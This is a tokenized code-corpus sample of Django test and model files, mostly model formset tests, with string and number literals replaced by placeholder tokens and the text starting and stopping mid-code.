"<STR_LIT>" <EOL> a . last_name = "<STR_LIT>" <EOL> self . assertRaises ( AttributeError , lambda : a . firstname ) <EOL> self . assertRaises ( AttributeError , lambda : a . last ) <EOL> self . assertQuerysetEqual ( <EOL> art . authors . all ( ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> six . text_type <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> a . article_set . all ( ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda a : a . headline <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> art . authors . filter ( last_name = '<STR_LIT>' ) , [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> six . text_type <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> @ python_2_unicode_compatible <EOL> class Article ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateField ( ) <EOL> expire_date = models . DateField ( ) <EOL> class Meta : <EOL> get_latest_by = '<STR_LIT>' <EOL> def __str__ ( self ) : <EOL> return self . headline <EOL> @ python_2_unicode_compatible <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> birthday = models . DateField ( ) <EOL> def __str__ ( self ) : <EOL> return self . name </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import datetime <EOL> import re <EOL> from datetime import date <EOL> from decimal import Decimal <EOL> from django import forms <EOL> from django . db import models <EOL> from django . forms . models import ( _get_foreign_key , inlineformset_factory , <EOL> modelformset_factory ) <EOL> from django . test import TestCase , skipUnlessDBFeature <EOL> from django . utils import six <EOL> from . models import ( Author , BetterAuthor , Book , BookWithCustomPK , <EOL> BookWithOptionalAltEditor , AlternateBook , AuthorMeeting , CustomPrimaryKey , <EOL> Place , Owner , Location , OwnerProfile , Restaurant , Product , Price , <EOL> MexicanRestaurant , ClassyMexicanRestaurant , Repository , Revision , <EOL> Person , Membership , Team , Player , Poet , Poem , Post ) <EOL> class DeletionTests ( TestCase ) : <EOL> def test_deletion ( self ) : <EOL> PoetFormSet = modelformset_factory ( Poet , can_delete = True ) <EOL> poet = Poet . objects . create ( name = '<STR_LIT:test>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : str ( poet . pk ) , <EOL> '<STR_LIT>' : '<STR_LIT:test>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = PoetFormSet ( data , queryset = Poet . objects . all ( ) ) <EOL> formset . save ( ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( Poet . objects . count ( ) , <NUM_LIT:0> ) <EOL> def test_add_form_deletion_when_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> PoetFormSet = modelformset_factory ( Poet , can_delete = True ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:x>' * <NUM_LIT:1000> , <EOL> } <EOL> formset = PoetFormSet ( data , queryset = Poet . objects . all ( ) ) <EOL> self . assertEqual ( formset . 
is_valid ( ) , False ) <EOL> self . assertEqual ( Poet . objects . count ( ) , <NUM_LIT:0> ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> formset = PoetFormSet ( data , queryset = Poet . objects . all ( ) ) <EOL> self . assertEqual ( formset . is_valid ( ) , True ) <EOL> formset . save ( ) <EOL> self . assertEqual ( Poet . objects . count ( ) , <NUM_LIT:0> ) <EOL> def test_change_form_deletion_when_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> PoetFormSet = modelformset_factory ( Poet , can_delete = True ) <EOL> poet = Poet . objects . create ( name = '<STR_LIT:test>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : six . text_type ( poet . id ) , <EOL> '<STR_LIT>' : '<STR_LIT:x>' * <NUM_LIT:1000> , <EOL> } <EOL> formset = PoetFormSet ( data , queryset = Poet . objects . all ( ) ) <EOL> self . assertEqual ( formset . is_valid ( ) , False ) <EOL> self . assertEqual ( Poet . objects . count ( ) , <NUM_LIT:1> ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> formset = PoetFormSet ( data , queryset = Poet . objects . all ( ) ) <EOL> self . assertEqual ( formset . is_valid ( ) , True ) <EOL> formset . save ( ) <EOL> self . assertEqual ( Poet . objects . count ( ) , <NUM_LIT:0> ) <EOL> class ModelFormsetTest ( TestCase ) : <EOL> def test_simple_save ( self ) : <EOL> qs = Author . objects . all ( ) <EOL> AuthorFormSet = modelformset_factory ( Author , extra = <NUM_LIT:3> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . 
as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorFormSet ( data = data , queryset = qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:2> ) <EOL> author1 , author2 = saved <EOL> self . assertEqual ( author1 , Author . objects . get ( name = '<STR_LIT>' ) ) <EOL> self . assertEqual ( author2 , Author . objects . get ( name = '<STR_LIT>' ) ) <EOL> authors = list ( Author . objects . order_by ( '<STR_LIT:name>' ) ) <EOL> self . assertEqual ( authors , [ author2 , author1 ] ) <EOL> qs = Author . objects . order_by ( '<STR_LIT:name>' ) <EOL> AuthorFormSet = modelformset_factory ( Author , extra = <NUM_LIT:1> , can_delete = False ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' % author2 . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' % author1 . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author2 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author1 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorFormSet ( data = data , queryset = qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> author3 = saved [ <NUM_LIT:0> ] <EOL> self . assertEqual ( author3 , Author . 
objects . get ( name = '<STR_LIT>' ) ) <EOL> authors = list ( Author . objects . order_by ( '<STR_LIT:name>' ) ) <EOL> self . assertEqual ( authors , [ author2 , author1 , author3 ] ) <EOL> qs = Author . objects . order_by ( '<STR_LIT:name>' ) <EOL> AuthorFormSet = modelformset_factory ( Author , extra = <NUM_LIT:1> , can_delete = True ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:4> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % author2 . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % author1 . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % author3 . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:3> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author2 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author1 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author3 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorFormSet ( data = data , queryset = qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . save ( ) , [ ] ) <EOL> authors = list ( Author . objects . order_by ( '<STR_LIT:name>' ) ) <EOL> self . assertEqual ( authors , [ author2 , author1 , author3 ] ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author2 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author1 . 
id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( author3 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorFormSet ( data = data , queryset = qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( saved [ <NUM_LIT:0> ] , Author . objects . get ( name = '<STR_LIT>' ) ) <EOL> def test_commit_false ( self ) : <EOL> author1 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> author2 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> author3 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> meeting = AuthorMeeting . objects . create ( created = date . today ( ) ) <EOL> meeting . authors = Author . objects . all ( ) <EOL> author4 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> AuthorMeetingFormSet = modelformset_factory ( AuthorMeeting , extra = <NUM_LIT:1> , can_delete = True ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( meeting . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ author2 . id , author1 . id , author3 . id , author4 . id ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorMeetingFormSet ( data = data , queryset = AuthorMeeting . objects . all ( ) ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> instances = formset . save ( commit = False ) <EOL> for instance in instances : <EOL> instance . created = date . today ( ) <EOL> instance . save ( ) <EOL> formset . save_m2m ( ) <EOL> self . assertQuerysetEqual ( instances [ <NUM_LIT:0> ] . authors . all ( ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_max_num ( self ) : <EOL> author1 = Author . 
objects . create ( name = '<STR_LIT>' ) <EOL> author2 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> author3 = Author . objects . create ( name = '<STR_LIT>' ) <EOL> qs = Author . objects . order_by ( '<STR_LIT:name>' ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = None , extra = <NUM_LIT:3> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:6> ) <EOL> self . assertEqual ( len ( formset . extra_forms ) , <NUM_LIT:3> ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = <NUM_LIT:4> , extra = <NUM_LIT:3> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:4> ) <EOL> self . assertEqual ( len ( formset . extra_forms ) , <NUM_LIT:1> ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = <NUM_LIT:0> , extra = <NUM_LIT:3> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( formset . extra_forms ) , <NUM_LIT:0> ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = None ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertQuerysetEqual ( formset . get_queryset ( ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = <NUM_LIT:0> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertQuerysetEqual ( formset . get_queryset ( ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = <NUM_LIT:4> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertQuerysetEqual ( formset . get_queryset ( ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_custom_save_method ( self ) : <EOL> class PoetForm ( forms . 
ModelForm ) : <EOL> def save ( self , commit = True ) : <EOL> author = super ( PoetForm , self ) . save ( commit = False ) <EOL> author . name = "<STR_LIT>" <EOL> if commit : <EOL> author . save ( ) <EOL> return author <EOL> PoetFormSet = modelformset_factory ( Poet , form = PoetForm ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> qs = Poet . objects . all ( ) <EOL> formset = PoetFormSet ( data = data , queryset = qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> poets = formset . save ( ) <EOL> self . assertEqual ( len ( poets ) , <NUM_LIT:2> ) <EOL> poet1 , poet2 = poets <EOL> self . assertEqual ( poet1 . name , '<STR_LIT>' ) <EOL> self . assertEqual ( poet2 . name , '<STR_LIT>' ) <EOL> def test_custom_form ( self ) : <EOL> """<STR_LIT>""" <EOL> class PostForm1 ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = Post <EOL> fields = ( '<STR_LIT:title>' , '<STR_LIT>' ) <EOL> class PostForm2 ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = Post <EOL> exclude = ( '<STR_LIT>' , ) <EOL> PostFormSet = modelformset_factory ( Post , form = PostForm1 ) <EOL> formset = PostFormSet ( ) <EOL> self . assertFalse ( "<STR_LIT>" in formset . forms [ <NUM_LIT:0> ] . fields ) <EOL> PostFormSet = modelformset_factory ( Post , form = PostForm2 ) <EOL> formset = PostFormSet ( ) <EOL> self . assertFalse ( "<STR_LIT>" in formset . forms [ <NUM_LIT:0> ] . fields ) <EOL> def test_model_inheritance ( self ) : <EOL> BetterAuthorFormSet = modelformset_factory ( BetterAuthor ) <EOL> formset = BetterAuthorFormSet ( ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . 
as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = BetterAuthorFormSet ( data ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> author1 , = saved <EOL> self . assertEqual ( author1 , BetterAuthor . objects . get ( name = '<STR_LIT>' ) ) <EOL> hemingway_id = BetterAuthor . objects . get ( name = "<STR_LIT>" ) . pk <EOL> formset = BetterAuthorFormSet ( ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:2> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % hemingway_id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : hemingway_id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = BetterAuthorFormSet ( data ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . save ( ) , [ ] ) <EOL> def test_inline_formsets ( self ) : <EOL> AuthorBooksFormSet = inlineformset_factory ( Author , Book , can_delete = False , extra = <NUM_LIT:3> ) <EOL> author = Author . objects . create ( name = '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet ( instance = author ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' % author . id ) <EOL> self . assertHTMLEqual ( formset . 
forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' % author . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' % author . id ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet ( data , instance = author ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> book1 , = saved <EOL> self . assertEqual ( book1 , Book . objects . get ( title = '<STR_LIT>' ) ) <EOL> self . assertQuerysetEqual ( author . book_set . all ( ) , [ '<STR_LIT>' ] ) <EOL> AuthorBooksFormSet = inlineformset_factory ( Author , Book , can_delete = False , extra = <NUM_LIT:2> ) <EOL> author = Author . objects . get ( name = '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet ( instance = author ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' % ( author . id , book1 . id ) ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' % author . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' % author . id ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( book1 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet ( data , instance = author ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> book2 , = saved <EOL> self . assertEqual ( book2 , Book . objects . 
get ( title = '<STR_LIT>' ) ) <EOL> self . assertQuerysetEqual ( author . book_set . order_by ( '<STR_LIT:title>' ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_inline_formsets_save_as_new ( self ) : <EOL> AuthorBooksFormSet = inlineformset_factory ( Author , Book , can_delete = False , extra = <NUM_LIT:2> ) <EOL> author = Author . objects . create ( name = '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet ( data , instance = Author ( ) , save_as_new = True ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> new_author = Author . objects . create ( name = '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet ( data , instance = new_author , save_as_new = True ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:2> ) <EOL> book1 , book2 = saved <EOL> self . assertEqual ( book1 . title , '<STR_LIT>' ) <EOL> self . assertEqual ( book2 . title , '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet ( prefix = "<STR_LIT:test>" ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:2> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> def test_inline_formsets_with_custom_pk ( self ) : <EOL> AuthorBooksFormSet2 = inlineformset_factory ( Author , BookWithCustomPK , can_delete = False , extra = <NUM_LIT:1> ) <EOL> author = Author . objects . create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet2 ( instance = author ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . 
forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet2 ( data , instance = author ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> book1 , = saved <EOL> self . assertEqual ( book1 . pk , <NUM_LIT> ) <EOL> book1 = author . bookwithcustompk_set . get ( ) <EOL> self . assertEqual ( book1 . title , '<STR_LIT>' ) <EOL> def test_inline_formsets_with_multi_table_inheritance ( self ) : <EOL> AuthorBooksFormSet3 = inlineformset_factory ( Author , AlternateBook , can_delete = False , extra = <NUM_LIT:1> ) <EOL> author = Author . objects . create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet3 ( instance = author ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> formset = AuthorBooksFormSet3 ( data , instance = author ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> book1 , = saved <EOL> self . assertEqual ( book1 . title , '<STR_LIT>' ) <EOL> self . assertEqual ( book1 . notes , '<STR_LIT>' ) <EOL> @ skipUnlessDBFeature ( '<STR_LIT>' ) <EOL> def test_inline_formsets_with_nullable_unique_together ( self ) : <EOL> AuthorBooksFormSet4 = inlineformset_factory ( Author , BookWithOptionalAltEditor , can_delete = False , extra = <NUM_LIT:2> ) <EOL> author = Author . objects . 
create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet4 ( data , instance = author ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:2> ) <EOL> book1 , book2 = saved <EOL> self . assertEqual ( book1 . author_id , <NUM_LIT:1> ) <EOL> self . assertEqual ( book1 . title , '<STR_LIT>' ) <EOL> self . assertEqual ( book2 . author_id , <NUM_LIT:1> ) <EOL> self . assertEqual ( book2 . title , '<STR_LIT>' ) <EOL> def test_inline_formsets_with_custom_save_method ( self ) : <EOL> AuthorBooksFormSet = inlineformset_factory ( Author , Book , can_delete = False , extra = <NUM_LIT:2> ) <EOL> author = Author . objects . create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' ) <EOL> book1 = Book . objects . create ( pk = <NUM_LIT:1> , author = author , title = '<STR_LIT>' ) <EOL> book2 = Book . objects . create ( pk = <NUM_LIT:2> , author = author , title = '<STR_LIT>' ) <EOL> book3 = Book . objects . create ( pk = <NUM_LIT:3> , author = author , title = '<STR_LIT>' ) <EOL> class PoemForm ( forms . ModelForm ) : <EOL> def save ( self , commit = True ) : <EOL> poem = super ( PoemForm , self ) . save ( commit = False ) <EOL> poem . name = "<STR_LIT>" <EOL> if commit : <EOL> poem . save ( ) <EOL> return poem <EOL> PoemFormSet = inlineformset_factory ( Poet , Poem , form = PoemForm ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> poet = Poet . objects . 
